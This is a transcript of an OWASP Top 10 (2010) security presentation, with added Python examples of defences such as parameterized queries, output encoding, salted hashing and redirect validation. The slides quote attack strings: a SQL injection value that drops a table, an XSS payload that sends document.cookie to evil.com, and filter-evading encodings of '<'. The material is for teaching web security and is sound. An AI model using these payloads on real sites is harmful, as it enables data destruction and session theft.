
OWASP top 10 - Agenda (presentation transcript)


1 OWASP OWASP top 10 - Agenda
- Background
- Risk based
- Top 10 items 1 – 6
- Live demo
- Top 10 items 7 – 10
- OWASP resources

2 OWASP The OWASP Guide

3 OWASP Risk rating factors
  Threat Agent | Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact
  ?            | Easy          | Widespread          | Easy                   | Severe           | ?
  ?            | Average       | Common              | Average                | Moderate         | ?
  ?            | Difficult     | Uncommon            | Difficult              | Minor            | ?

4 OWASP Warning
- Risk analysis
- Insiders
- Architecture
- Modular
- Clarity
- SDLC
- Knowledge
- Predictability

5 OWASP Top 10 - 2010
1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security misconfiguration
7. Insecure cryptographic storage
8. Failure to restrict URL access
9. Insufficient transport layer protection
10. Unvalidated redirects and forwards

6 OWASP A1 – Injection (diagram: Client → Appl → DB, Shell, Pgm, CPU)

7 OWASP A1 – Injection

    String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";

    id = "foo';DROP accnts;--"
    SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';

    id = "foo"
    SELECT * FROM accnts WHERE ID='foo';
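The slide's Java line builds the SQL statement by string concatenation, so the `id` parameter becomes part of the SQL text. The following added example (not from the presentation) reproduces that construction in Python to show the exact strings the slide lists, and beside it the parameterized form that the OWASP guidance recommends, run against a constructed in-memory SQLite table named `accnts` so the result can be checked. The table contents and the `lookup_parameterized` function name are assumptions for the example.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the slide's "accnts" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accnts (ID TEXT PRIMARY KEY, balance INTEGER)")
    conn.execute("INSERT INTO accnts VALUES ('foo', 100)")
    conn.commit()
    return conn


def build_query_by_concatenation(user_id: str) -> str:
    # Same construction as the slide's Java line: the parameter is pasted into
    # the SQL text, so a quote inside it ends the literal and the rest is SQL.
    return "SELECT * FROM accnts WHERE ID='" + user_id + "'"


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    # The SQL text is fixed and the value travels separately as a bind
    # parameter; the driver never re-parses the value as SQL, so the
    # slide's payload is simply compared against the ID column as a string.
    cur = conn.execute("SELECT * FROM accnts WHERE ID = ?", (user_id,))
    return cur.fetchall()


def table_exists(conn: sqlite3.Connection, name: str = "accnts") -> bool:
    # Used to confirm that the table survived the lookup.
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    for candidate in ("foo", "foo';DROP accnts;--"):
        print(build_query_by_concatenation(candidate))
    conn = setup_db()
    print(lookup_parameterized(conn, "foo"))
    print(lookup_parameterized(conn, "foo';DROP accnts;--"), table_exists(conn))
```

The first function is shown only to make the slide's two resulting statements visible; it is never executed. Note that refusing stacked statements is a property of some drivers, not a defence: the concatenated string is still attacker-controlled SQL, and the parameterized query is the fix.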

8 OWASP A2 - Cross site scripting (XSS) (diagram: Browser → Appl → DB)

9 OWASP A2 - Cross site scripting (XSS)

    (String) page += " ... ";   (the HTML markup inside the string was lost in extraction)

    Attacker-supplied parameter:
    CC=123456789"> window.location=http://evil.com?x=document.cookie '>

    Normal parameter:
    CC="123456789"

10 OWASP A2 - Cross site scripting (XSS)
Different encodings of "<":
  &#x003c  &#X3c  &#x3C  000003C;  \x3c  \x3C  \u003c  \u003C  <  %3C  &lt  <  &LT  &LT;  &#60  &#060  <
Injection points that need no script tag:
  <img src=http://site.com onmouseover=
  <body onload=
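Slide 10 makes the point that "<" can be written in many encodings, so a filter that looks for one spelling of a tag will miss the others. The defensive answer to both slides 9 and 10 is to encode on output and, where input must be inspected, to canonicalize first. This added example (not from the presentation) shows both using Python's standard library: `html.escape` turns the slide-9 parameter value into inert attribute text, and `canonicalize` repeatedly undoes percent-encoding and HTML character references before checking for "<", so it recognises the HTML-entity and URL-encoded forms from slide 10 (the JavaScript `\x3c`/`\u003c` forms are string-literal escapes and are deliberately out of scope here). Function names and the `max_rounds` limit are assumptions for the example.

```python
import html
from urllib.parse import unquote


def encode_for_html_attribute(value: str) -> str:
    # Output encoding: '<', '>', '&', '"' and "'" become character references,
    # so the browser treats the whole value as data inside the attribute.
    return html.escape(value, quote=True)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    # Reduce the input to one canonical form before any validation: undo URL
    # percent-encoding and HTML character references until nothing changes,
    # which also unwraps double-encoded input such as %253C.
    current = value
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current


def contains_tag_start(value: str) -> bool:
    # Decide on the canonical form, not on the raw bytes the client sent.
    return "<" in canonicalize(value)


# The HTML-entity and URL-encoded spellings of "<" listed on slide 10.
SLIDE_FORMS = ["&#x003c", "&#X3c", "&#x3C", "%3C", "&lt", "<", "&LT", "&LT;", "&#60", "&#060"]


if __name__ == "__main__":
    print(encode_for_html_attribute('123456789"> window.location=http://evil.com?x=document.cookie \'>'))
    for form in SLIDE_FORMS:
        print(repr(form), "->", repr(canonicalize(form)), contains_tag_start(form))
```

Canonicalization is only a supporting control for places where input must be inspected; the control that actually stops the slide-9 payload is the output encoding, applied at the point where the value is written into the page.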

11 OWASP A3 - Broken authentication and session management
- Unpredictable passwords, session IDs, security questions
- No session IDs/credentials in the URL
- Avoid session fixation
- Session time-out & logout buttons
- Different session IDs outside/inside TLS
- No clear-text passwords
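The bullets above describe properties of a session mechanism rather than code. This added example (not from the presentation) implements them in a small in-memory session store: identifiers come from the OS CSPRNG, the identifier is rotated when the user authenticates (which defeats session fixation), idle sessions expire, logout discards the server-side record, and the identifier is delivered in a `Secure; HttpOnly` cookie rather than in the URL, which also covers the "use secure cookies" point of slide 17. The class name, the cookie name `SESSIONID`, the 15-minute timeout and the injectable clock are assumptions for the example.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds; constructed value, tune per application


class SessionStore:
    def __init__(self, clock=time.time):
        # The clock is injectable so expiry can be tested without sleeping.
        self._clock = clock
        self._sessions = {}  # session id -> {"user": name or None, "last_seen": t}

    def create(self) -> str:
        # 256 bits from secrets.token_urlsafe: not derivable from time, counters
        # or other users' identifiers.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def login(self, sid: str, user: str) -> str:
        # Rotate the identifier at the privilege change: whatever id the browser
        # held before authentication (possibly planted by an attacker) is dropped,
        # so a fixated id never becomes an authenticated session.
        self._sessions.pop(sid, None)
        new_sid = self.create()
        self._sessions[new_sid]["user"] = user
        return new_sid

    def user_for(self, sid: str):
        # Resolve an id to a user, enforcing the idle time-out on every request.
        record = self._sessions.get(sid)
        if record is None:
            return None
        now = self._clock()
        if now - record["last_seen"] > IDLE_TIMEOUT:
            self._sessions.pop(sid)
            return None
        record["last_seen"] = now
        return record["user"]

    def logout(self, sid: str) -> None:
        # Logout invalidates the server-side record, not just the browser cookie.
        self._sessions.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    # The id travels in a cookie, never in the URL: Secure keeps it off plain
    # HTTP, HttpOnly keeps it away from script (the slide-9 document.cookie
    # payload), SameSite limits cross-site sending.
    return f"Set-Cookie: SESSIONID={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


if __name__ == "__main__":
    store = SessionStore()
    anonymous = store.create()
    authenticated = store.login(anonymous, "alice")
    print(set_cookie_header(authenticated))
    print(store.user_for(anonymous), store.user_for(authenticated))
```

The "different session IDs outside/inside TLS" bullet is handled here in the simplest way: a single identifier that is only ever sent over TLS because of the `Secure` attribute.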

12 OWASP A4 - Insecure direct object references
Periods the user may see: 2010q1, 2011q2
Request parameter: period=2011q2 changed to period=2011q3

13 OWASP A5 - Cross-site request forgery (CSRF)

14 OWASP A6 - Security misconfiguration
- Patching
  - OS
  - Application
  - Frameworks / libraries
- Disable unnecessary services
- Stack traces
- Configuration

15 OWASP A7 - Insecure cryptographic storage
- Keep track of sensitive data
- Passwords one-way hashed & salted
- Password/key management
- TLS key pass phrase
- M2M passwords (obfuscation)
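The "one-way hashed & salted" bullet is the one item on this slide that maps directly to code. This added example (not from the presentation) stores a password with PBKDF2-HMAC-SHA256 from Python's standard library: a fresh 16-byte random salt per password, an iteration count stored alongside the hash so it can be raised later without breaking existing records, and a constant-time comparison on verification. The storage format string, the function names and the iteration count are assumptions for the example.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 200_000  # constructed value; raise it as hardware allows
SALT_BYTES = 16


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def hash_password(password: str, salt: bytes = None) -> str:
    # A random salt per password means two users with the same password get
    # different hashes and precomputed tables cannot be reused across records.
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # Self-describing record: algorithm, cost, salt, hash.
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, _b64(salt), _b64(derived))


def verify_password(stored: str, candidate: str) -> bool:
    # Recompute with the parameters stored in the record, not the current
    # defaults, so records hashed at an older cost still verify.
    try:
        algorithm, iterations, salt_b64, hash_b64 = stored.split("$")
    except ValueError:
        return False
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    derived = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"), salt, int(iterations))
    # Constant-time comparison: the time taken does not depend on which byte differs.
    return hmac.compare_digest(derived, expected)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password(record, "correct horse battery staple"), verify_password(record, "wrong"))
```

A plain SHA-256 of the password, even with a salt, would be too fast to resist offline guessing; the iteration count is what makes each guess expensive, and storing it in the record is what lets you increase it over time.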

16 OWASP A8 - Failure to restrict URL access
  /user/getAccounts
  /admin/getAccounts
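Slides 12 and 16 are two faces of the same missing check: the `period` parameter is a reference the user can edit, and `/admin/getAccounts` is a URL anyone can type. This added example (not from the presentation) shows a request handler that enforces both on every request, a role check on the URL and an ownership check on the referenced object, with deny-by-default for unknown URLs. The user records, the grant table and the function names are constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    roles: frozenset


# Constructed: which roles may reach which URL (slide 16). Anything not listed is denied.
ROUTE_ROLES = {
    "/user/getAccounts": frozenset({"user", "admin"}),
    "/admin/getAccounts": frozenset({"admin"}),
}

# Constructed: which reporting periods each user is entitled to see (slide 12).
PERIOD_GRANTS = {
    "alice": frozenset({"2010q1", "2011q2"}),
    "root": frozenset({"2010q1", "2011q2", "2011q3"}),
}


class Forbidden(Exception):
    pass


def authorize_url(user: User, path: str) -> None:
    # Server-side check on the URL itself; hiding the link in the menu is not a control.
    allowed = ROUTE_ROLES.get(path)
    if allowed is None or not (user.roles & allowed):
        raise Forbidden(path)


def authorize_period(user: User, period: str) -> None:
    # The parameter is checked against this user's grants, not merely for valid syntax,
    # so changing period=2011q2 to period=2011q3 is rejected unless 2011q3 is granted.
    if period not in PERIOD_GRANTS.get(user.name, frozenset()):
        raise Forbidden(period)


def request(user: User, path: str, period: str) -> tuple:
    # Returns (status, body) like a tiny HTTP handler.
    try:
        authorize_url(user, path)
        authorize_period(user, period)
    except Forbidden:
        return 403, ""
    return 200, f"accounts report for {user.name}, period {period}"


if __name__ == "__main__":
    alice = User("alice", frozenset({"user"}))
    root = User("root", frozenset({"admin"}))
    print(request(alice, "/user/getAccounts", "2011q2"))
    print(request(alice, "/user/getAccounts", "2011q3"))
    print(request(alice, "/admin/getAccounts", "2011q2"))
    print(request(root, "/admin/getAccounts", "2011q3"))
```

Both checks live in the handler, not in the page that renders the links: a user who edits the query string or types the admin URL hits exactly the same code path as one who clicks through.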

17 OWASP A9 - Insufficient transport layer protection
- Use SSL/TLS
- No mixed content
- Use secure cookies
- Example: Firesheep exploits poor solutions

18 OWASP A10 - Unvalidated redirects and forwards
- http://www.vuln.com/redir.asp?=http://www.links.com
- http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
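The second URL on the slide is the same kind of external target as the first, only percent-encoded (it decodes to `http://www.google.com`), which is why a check on the raw string is not enough. This added example (not from the presentation) validates a redirect target by decoding it first and then accepting only a same-site relative path or an exact match against an allow-list of hosts; `www.vuln.com` is taken from the slide as the site's own host and everything else is an assumption for the example.

```python
from urllib.parse import unquote, urlsplit

# Constructed: hosts this site is willing to redirect to. Exact matches only.
ALLOWED_HOSTS = frozenset({"www.vuln.com"})


def decoded_host(target: str) -> str:
    # Decode percent-encoding before parsing, so an encoded host such as the
    # slide's %77%77%77... is judged by its real name.
    return urlsplit(unquote(target)).netloc.lower()


def is_safe_redirect(target: str) -> bool:
    decoded = unquote(target)
    parts = urlsplit(decoded)
    if parts.scheme == "" and parts.netloc == "":
        # A path on this site. "//host" is scheme-relative and would leave the
        # site, so only a single leading slash is accepted; backslashes are
        # rejected because some browsers treat them like slashes.
        return decoded.startswith("/") and not decoded.startswith("//") and "\\" not in decoded
    # Absolute URL: only http(s) to an allow-listed host, compared exactly
    # (substring checks would accept www.vuln.com.example).
    return parts.scheme in ("http", "https") and parts.netloc.lower() in ALLOWED_HOSTS


def redirect_location(target: str, fallback: str = "/") -> str:
    # What the handler puts in the Location header: the target if it passes,
    # otherwise a fixed landing page.
    return target if is_safe_redirect(target) else fallback


if __name__ == "__main__":
    for candidate in (
        "http://www.links.com",
        "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D",
        "/account/home",
        "https://www.vuln.com/home",
    ):
        print(candidate, "->", redirect_location(candidate))
```

An allow-list of complete hosts is the simplest robust rule; if the application only ever redirects within itself, dropping the absolute-URL branch entirely and accepting relative paths alone is simpler still.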

19 OWASP OWASP resources
- OWASP Secure Software Contract Annex
- OWASP Developer’s Guide
- OWASP Enterprise Security API (ESAPI)
- OWASP Software Assurance Maturity Model (SAMM)
- OWASP WebGoat

